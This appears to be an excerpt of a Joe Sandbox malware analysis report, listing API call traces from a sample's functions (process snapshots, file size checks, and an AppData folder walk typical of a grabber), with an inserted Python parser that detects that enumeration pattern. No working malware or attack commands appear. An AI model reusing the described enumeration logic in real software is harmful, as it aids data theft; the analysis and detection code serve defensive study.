                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                              • String ID:
                              • API String ID: 1066202413-0
                              • Opcode ID: 42a2dcab278ea0cd9ec5f74203a8a0e3c7ec2980f68d48dc556207c3279631de
                              • Instruction ID: b46a4e114d7484e537b0668b4eb3057934a5459237eda9bd47d57002be07d59b
                              • Opcode Fuzzy Hash: 42a2dcab278ea0cd9ec5f74203a8a0e3c7ec2980f68d48dc556207c3279631de
                              • Instruction Fuzzy Hash: 19318F71941218EBCB25DF90CC51FEEB778FF18702F504299F91AAA190DB306A48CFA1
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00160E00,00000000,?), ref: 001579B0
                              • RtlAllocateHeap.NTDLL(00000000), ref: 001579B7
                              • GetLocalTime.KERNEL32(?,?,?,?,?,00160E00,00000000,?), ref: 001579C4
                              • wsprintfA.USER32 ref: 001579F3
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                               • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateLocalProcessTimewsprintf
                              • String ID:
                              • API String ID: 377395780-0
                              • Opcode ID: 5b765afec51646ba26b3dfc7b08d1f6022b59446410c6a56389a01c180fee7b0
                              • Instruction ID: 8b1971631cdc6080efded523bb44ea9bfdc3030f9b5807e44b12bc9c0fe2629c
                              • Opcode Fuzzy Hash: 5b765afec51646ba26b3dfc7b08d1f6022b59446410c6a56389a01c180fee7b0
                              • Instruction Fuzzy Hash: 321118B2904618ABDB149FC9ED45BBEBBFCEB48B11F10415AF605A2280E3395940C7B1
                              APIs
                              • CreateFileA.KERNEL32(00153AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,00153AEE,?), ref: 001592FC
                              • GetFileSizeEx.KERNEL32(000000FF,00153AEE), ref: 00159319
                              • CloseHandle.KERNEL32(000000FF), ref: 00159327
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                               • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$CloseCreateHandleSize
                              • String ID:
                              • API String ID: 1378416451-0
                              • Opcode ID: c3d6974fa27f47b37c0a6b615e5b1d8c422099ff20c791bd02c0670ea8639a2f
                              • Instruction ID: b22cbec32dc315c494f5c47fd80b80251f1f568007a105e71b9ce25958ca7a11
                              • Opcode Fuzzy Hash: c3d6974fa27f47b37c0a6b615e5b1d8c422099ff20c791bd02c0670ea8639a2f
                              • Instruction Fuzzy Hash: 95F08C38E00308FBEB10DBF0DC08B9E77B9FB48311F108294BA21AB2C0D67096009B41
                              APIs
                              • __getptd.LIBCMT ref: 0015C74E
                                • Part of subcall function 0015BF9F: __amsg_exit.LIBCMT ref: 0015BFAF
                              • __getptd.LIBCMT ref: 0015C765
                              • __amsg_exit.LIBCMT ref: 0015C773
                              • __updatetlocinfoEx_nolock.LIBCMT ref: 0015C797
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                              • String ID:
                              • API String ID: 300741435-0
                              • Opcode ID: 2b32bb58096cd6883ea3ba911bd3d53ebe11f7a70d507b70526d65ee6e988d08
                              • Instruction ID: 9cffd8177756222cb7b05f3337db7d14b0012944dee6c742532dad92aa9eca5d
                              • Opcode Fuzzy Hash: 2b32bb58096cd6883ea3ba911bd3d53ebe11f7a70d507b70526d65ee6e988d08
                              • Instruction Fuzzy Hash: F1F09032948710DFD720BFB85C8674E33A06F14727F24414AFC35AE5D2CBA459889ED6
                              APIs
                                • Part of subcall function 00158DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00158E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 00154F7A
                              • lstrcat.KERNEL32(?,00161070), ref: 00154F97
                              • lstrcat.KERNEL32(?,00DD9210), ref: 00154FAB
                              • lstrcat.KERNEL32(?,00161074), ref: 00154FBD
                                • Part of subcall function 00154910: wsprintfA.USER32 ref: 0015492C
                                • Part of subcall function 00154910: FindFirstFileA.KERNEL32(?,?), ref: 00154943
                                • Part of subcall function 00154910: StrCmpCA.SHLWAPI(?,00160FDC), ref: 00154971
                                • Part of subcall function 00154910: StrCmpCA.SHLWAPI(?,00160FE0), ref: 00154987
                                • Part of subcall function 00154910: FindNextFileA.KERNEL32(000000FF,?), ref: 00154B7D
                                • Part of subcall function 00154910: FindClose.KERNEL32(000000FF), ref: 00154B92
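                              The API chain above (SHGetFolderPathA with nFolder 0x1C, a run of lstrcat calls, then FindFirstFileA/FindNextFileA with two StrCmpCA name checks inside subcall 00154910) is the shape of a directory-walking grabber routine rooted in a known-folder path. The following is an added example, not part of the Joe Sandbox report or the sample: a Python parser for this API list format that resolves the CSIDL argument (0x1C is CSIDL_LOCAL_APPDATA in shlobj.h) and flags the root-folder, path-build, directory-walk pattern. The input is the record above, embedded as a constructed string; the function and field names are my own. The two strings compared by StrCmpCA (00160FDC, 00160FE0) are not resolved in the report, so the code only records that name comparisons exist in the walk rather than assuming what they are.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed input: the API list of one function record, in the shape the
# report prints it (indented entries are "Part of subcall function" lines).
TRACE = """\
  • Part of subcall function 00158DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00158E0B
• lstrcat.KERNEL32(?,00000000), ref: 00154F7A
• lstrcat.KERNEL32(?,00161070), ref: 00154F97
• lstrcat.KERNEL32(?,00DD9210), ref: 00154FAB
• lstrcat.KERNEL32(?,00161074), ref: 00154FBD
  • Part of subcall function 00154910: wsprintfA.USER32 ref: 0015492C
  • Part of subcall function 00154910: FindFirstFileA.KERNEL32(?,?), ref: 00154943
  • Part of subcall function 00154910: StrCmpCA.SHLWAPI(?,00160FDC), ref: 00154971
  • Part of subcall function 00154910: StrCmpCA.SHLWAPI(?,00160FE0), ref: 00154987
  • Part of subcall function 00154910: FindNextFileA.KERNEL32(000000FF,?), ref: 00154B7D
  • Part of subcall function 00154910: FindClose.KERNEL32(000000FF), ref: 00154B92
"""

# One report line: optional subcall prefix, Api.MODULE, optional (args), "ref: addr".
_LINE = re.compile(
    r"•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]          # raw hex or "?" when the tracer could not resolve it
    ref: str                 # address of the call site
    subcall: Optional[str]   # callee address when the call sits inside a subroutine


def parse_trace(text: str) -> List[ApiCall]:
    """Parse the report's API list into structured calls; skips non-matching lines."""
    calls: List[ApiCall] = []
    for line in text.splitlines():
        m = _LINE.search(line)
        if not m:
            continue
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw else []
        calls.append(ApiCall(m.group("api"), m.group("mod"), args, m.group("ref"), m.group("sub")))
    return calls


# Subset of the shlobj.h CSIDL constants; high bits of nFolder carry flags
# such as CSIDL_FLAG_CREATE (0x8000), so only the low byte is looked up.
_CSIDL = {
    0x05: "CSIDL_PERSONAL",
    0x10: "CSIDL_DESKTOPDIRECTORY",
    0x1A: "CSIDL_APPDATA",
    0x1C: "CSIDL_LOCAL_APPDATA",
    0x28: "CSIDL_PROFILE",
}


def csidl_name(arg: str) -> str:
    """Resolve the nFolder argument of SHGetFolderPath to its CSIDL name."""
    if arg == "?":
        return "unknown"
    value = int(arg, 16) & 0x00FF
    return _CSIDL.get(value, "CSIDL_0x%02X" % value)


def classify_enumeration(calls: List[ApiCall]) -> Optional[Dict[str, object]]:
    """Flag the known-folder root -> path build -> FindFirst/FindNext walk chain.

    Returns a finding dict when all three stages are present, else None.
    """
    root = next((c for c in calls if c.api.startswith("SHGetFolderPath")), None)
    builds = [c for c in calls if c.api in ("lstrcat", "lstrcatA", "wsprintfA", "PathAppendA")]
    first = next((c for c in calls if c.api.startswith("FindFirstFile")), None)
    nxt = next((c for c in calls if c.api.startswith("FindNextFile")), None)
    if not (root and first and nxt):
        return None
    return {
        "root": csidl_name(root.args[1]) if len(root.args) > 1 else "unknown",
        "path_build_calls": len(builds),
        "walk_in_subcall": first.subcall,
        # StrCmpCA inside the walk means entries are filtered by name; the
        # compared strings are not resolved in the report, so no guess is made.
        "filters_names": any(c.api.startswith("StrCmp") for c in calls),
    }


if __name__ == "__main__":
    finding = classify_enumeration(parse_trace(TRACE))
    print(finding)
```

Running the block on the record prints a finding rooted at CSIDL_LOCAL_APPDATA with five path-building calls and the walk located in subcall 00154910. The same parser can be pointed at other records of the report to compare which known folders each enumeration routine starts from.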
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                              • String ID:
                              • API String ID: 2667927680-0
                              • Opcode ID: c88f34aac727d10bdfbb06c2a8e48425927e851f6bd69c665624ad22b0722398
                              • Instruction ID: 7f2c224ab8872af67229dba9b439a555f1b0c4c3edd5b6a3774f63f9d3291a3a
                              • Opcode Fuzzy Hash: c88f34aac727d10bdfbb06c2a8e48425927e851f6bd69c665624ad22b0722398
                              • Instruction Fuzzy Hash: B721DA76900308A7D755FBB0DC46EEE337CAB69301F004589B69997181EF749ACC8BA2